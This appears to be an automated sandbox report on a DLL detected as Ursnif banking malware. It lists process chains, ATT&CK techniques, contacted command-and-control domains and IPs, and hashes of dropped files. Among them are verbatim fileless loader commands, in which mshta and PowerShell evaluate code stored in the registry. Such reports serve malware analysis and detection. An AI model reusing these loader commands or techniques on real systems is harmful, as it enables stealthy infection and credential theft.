          Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6C5CF5FD0
          Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 1E7A4010000
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: explorer.exe, 00000020.00000000.827609490.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000020.00000000.839211937.0000000005E50000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA12A cpuid 2_2_033FA12A
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F8714 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,2_2_033F8714
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_033FA12A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA667 GetVersionExA,wsprintfA,2_2_033FA667
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Ursnif
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          Yara detected Ursnif

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Credential API Hooking 3 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Command and Scripting Interpreter 1 | Boot or Logon Initialization Scripts | Process Injection 812 | Software Packing 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 11 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | PowerShell 1 | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Credential API Hooking 3 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rootkit 4 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 3 | Cached Domain Credentials | Security Software Discovery 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 812 | DCSync | Virtualization/Sandbox Evasion 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 1 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 353281; Sample: SecuriteInfo.com.Generic.mg...; Startdate: 16/02/2021; Architecture: WINDOWS; Score: 100. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll | 16% | Virustotal |
          SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll | 10% | ReversingLabs | Win32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.3.regsvr32.exe.5c2e4a0.2.unpack | 100% | Avira | HEUR/AGEN.1132033
          2.3.regsvr32.exe.5ea94a0.1.unpack | 100% | Avira | HEUR/AGEN.1132033
          2.2.regsvr32.exe.33f0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

          Domains

          Source | Detection | Scanner | Label
          tls13.taboola.map.fastly.net | 0% | Virustotal |
          c56.lepini.at | 8% | Virustotal |
          api3.lepini.at | 11% | Virustotal |
          api10.laptok.at | 11% | Virustotal |
          img.img-taboola.com | 1% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          contextual.media.net | 184.30.24.22 | true | false | | high
          tls13.taboola.map.fastly.net | 151.101.1.44 | true | false | | unknown
          hblg.media.net | 184.30.24.22 | true | false | | high
          c56.lepini.at | 34.65.144.159 | true | true | | unknown
          lg3.media.net | 184.30.24.22 | true | false | | high
          resolver1.opendns.com | 208.67.222.222 | true | false | | high
          api3.lepini.at | 34.65.144.159 | true | false | | unknown
          geolocation.onetrust.com | 104.20.184.68 | true | false | | high
          api10.laptok.at | 34.65.144.159 | true | false | | unknown
          www.msn.com | unknown | unknown | false | | high
          srtb.msn.com | unknown | unknown | false | | high
          img.img-taboola.com | unknown | unknown | true | | unknown
          web.vortex.data.msn.com | unknown | unknown | false | | high
          cvision.media.net | unknown | unknown | false | | high

                            Contacted URLs


                            URLs from Memory and Binaries


                                        Contacted IPs

                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        34.65.144.159 | unknown | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
                                        104.20.184.68 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                        151.101.1.44 | unknown | United States | 54113 | FASTLYUS | false

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:353281
                                        Start date:16.02.2021
                                        Start time:00:56:32
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 40s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:36
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:4
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.bank.troj.spyw.evad.winDLL@36/159@18/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 84.2% (good quality ratio 79.5%)
                                        • Quality average: 79.2%
                                        • Quality standard deviation: 29.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 169
                                        • Number of non-executed functions: 21
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 184.30.24.22, 51.104.144.132, 92.122.213.194, 92.122.213.247, 152.199.19.161, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129
                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        00:58:27 | API Interceptor | 43x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs


                                                                                Domains

                                                                                8.prtyok.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Variant.Razy.840176.14264.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                contextual.media.netSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 23.218.208.23
                                                                                1233.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                Server.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                2200.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon48_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                • 92.122.253.103
                                                                                Wh102yYa..dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                • 2.20.86.97
                                                                                8.prtyok.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24
                                                                                SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24

                                                                                ASN

                                                                                Match    Associated Sample Name / URL    SHA 256    Detection    Link    Context

                                                                                JA3 Fingerprints

                                                                                Match    Associated Sample Name / URL    SHA 256    Detection    Link    Context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):13
                                                                                Entropy (8bit):2.469670487371862
                                                                                Encrypted:false
                                                                                SSDEEP:3:D90aKb:JFKb
                                                                                MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                Malicious:false
                                                                                Preview: <root></root>
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):3456
                                                                                Entropy (8bit):4.918959247422732
                                                                                Encrypted:false
                                                                                SSDEEP:96:5hhuhzzsnzz8z333mmmmmV4TmV4TmVBjCmVBjC9mVBjCmVBjCYmVBjCo:9FlFCT
                                                                                MD5:914C0B18BC03E6C4E22926FB7F3D0934
                                                                                SHA1:4907DA2B852B908C8BB4C83DC66675B45B1A625E
                                                                                SHA-256:70B5FE8346DDE5AEC2B183A40A78D504793508355B423A2611A47EA95C247B34
                                                                                SHA-512:B153CD4D11F48FB3C4261BC0D8F1E4C22C46D75CFB67E81DC523CD78A226821D38CAE1EDAF9F84F6F4ACABD038CC5B66BEB8BB9675C4381C37A74541A354F3C4
                                                                                Malicious:false
                                                                                Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425692880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425892880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1428972880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><ro
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):106280
                                                                                Entropy (8bit):2.2643158250238193
                                                                                Encrypted:false
                                                                                SSDEEP:3072:Bo04F02T0ST0lT0BT0NT0290UT0qT0l90W90Z90gP0zT0xT0PP0TP0MP0/PO8PO/:Bo04F02T0ST0lT0BT0NT0290UT0qT0le
                                                                                MD5:60A4C05540136C1EBE77D6DF45863775
                                                                                SHA1:33AED884DB09782252EAC8B7682B7476E2E9298C
                                                                                SHA-256:EA1DAF5A07B167DC44F76911741018ECF8AC16542FCBF852DCDFD000C3D072DE
                                                                                SHA-512:0C8DF9733C60F4759C4FDA0F0B5A4A7B57F2A3BAF636D10C5FFD7BAF7B40F6D2AB4CB33B3382E3FCD0AA531517C101A86E1E84AA4D6C07CABEDF812DBA40AF38
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8F499AB0-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):194958
                                                                                Entropy (8bit):3.5847035569441683
                                                                                Encrypted:false
                                                                                SSDEEP:3072:4Z/2BfcYmu5kLTzGtLZ/2Bfc/mu5kLTzGt5:xai
                                                                                MD5:EACFFBFFDFE1B8289692FF8AFA5D1BA7
                                                                                SHA1:1934377F000A44A16524ECBC2D50FC0653EC51F3
                                                                                SHA-256:0E85426046C7545253C9AC3E2749DAD549756C7630DA6C6A2DF2793979CADAED
                                                                                SHA-512:572A0B34F7BECDA1AE706B66E6EBD8BB0744226D31B57A63AC61E0E18A7EA6AB14FFCDABA6ED5954701F6C5050344E3C05DFDB9F83F2C832D32198096DE18680
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407C-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28144
                                                                                Entropy (8bit):1.9161627712752582
                                                                                Encrypted:false
                                                                                SSDEEP:96:rCZlQ567BSTjR2yW7M3ZS5NWBJs8ESm1S5NWXO5NWBJs8EiA:rCZlQ567kTjR2yW7M3ZXcSm1/jciA
                                                                                MD5:54B1BD50F47CC224E53759BA4FBD617F
                                                                                SHA1:1878BF1E537FBE26D6D5D25BBB9A77DF3897CF6C
                                                                                SHA-256:DB7C51AC1C7C4B2350076BAE6D0D07737A562D6F3A179AEA9764BCDFDB2E6FAD
                                                                                SHA-512:784388EC585F94364E182BB22CD3A68361E2CA2707755D64703ECD54FF81DE97DD788341F2C2816AEA5A89FD271EDBA106643C4818109FC7E7607FF435B22608
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407E-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28152
                                                                                Entropy (8bit):1.9173576656143714
                                                                                Encrypted:false
                                                                                SSDEEP:96:roZ7Qv6tBSfjZ2+WYMIx/N4yhYVZjD2ks/Nf14yhYVZjCA:roZ7Qv6tkfjZ2+WYMIxuySjKlAySjCA
                                                                                MD5:E8BEE74CC905B34ABAEF35501069223B
                                                                                SHA1:7C537AA9214D4CB66B5C2184A1911A92FDEC761E
                                                                                SHA-256:AF40EE958AC5E55BBD0B9F240FD3FE4783FBA184BA3B60A8591E6A3E12A7E4F2
                                                                                SHA-512:0FCCA420620998691DFBF37B6A847DC24B8C90E7EC95D275D60023551598623BB9EEFBE18D5F838308CD68F190CFA76CBD291B5E4E79EE2415040C312A3D23D5
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E34080-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28696
                                                                                Entropy (8bit):1.9162549240413231
                                                                                Encrypted:false
                                                                                SSDEEP:192:rgZDQL6mkljeq2soWI9MjsR8PktsBtEM8BPktsBIr:rQMOnBQw9IsE4PGE4g
                                                                                MD5:B67F2B77E558B521016FFBC1D4340618
                                                                                SHA1:1D6B1B06A421F244A0767A65842A35E37BC0FE24
                                                                                SHA-256:442A06440C8DC96604C47EB641D8D2052C4CEADC83B9AAF12CA4F584961C2D53
                                                                                SHA-512:1C9A645EC2E02C9F045BEB1805FA0A4AC67C400ADBA463CADEA49B01E20F7F8F7249B4E7B7A736855B1574037375EBEF7BB51FE022878449FA85F26B81C72CCD
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B1D25056-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):19032
                                                                                Entropy (8bit):1.5825707586616589
                                                                                Encrypted:false
                                                                                SSDEEP:48:Iw91GcprXOGwpakG4pQYGrapbSfGQpKvG7HpRATGIpX2bGApm:r9rZXmQU6mBSJA+TUFag
                                                                                MD5:142AE331E82FFFCB2EA09C49CDF053A2
                                                                                SHA1:88B2A08DB3F97D2171734ADB536D17D8CB0864D3
                                                                                SHA-256:23F2C0326A4B51AC31AD4C7C8E9687A3162E9CDD4790E126CF1B7BD4F6B45375
                                                                                SHA-512:4B3F84CADFF8C1F167964A3F10B4E32306BD90AE7BF863081B5CE4E1081711FFBA3B54EA1180D7739B1644719EF76614990ACA9CE1E134A5CD064F414E693384
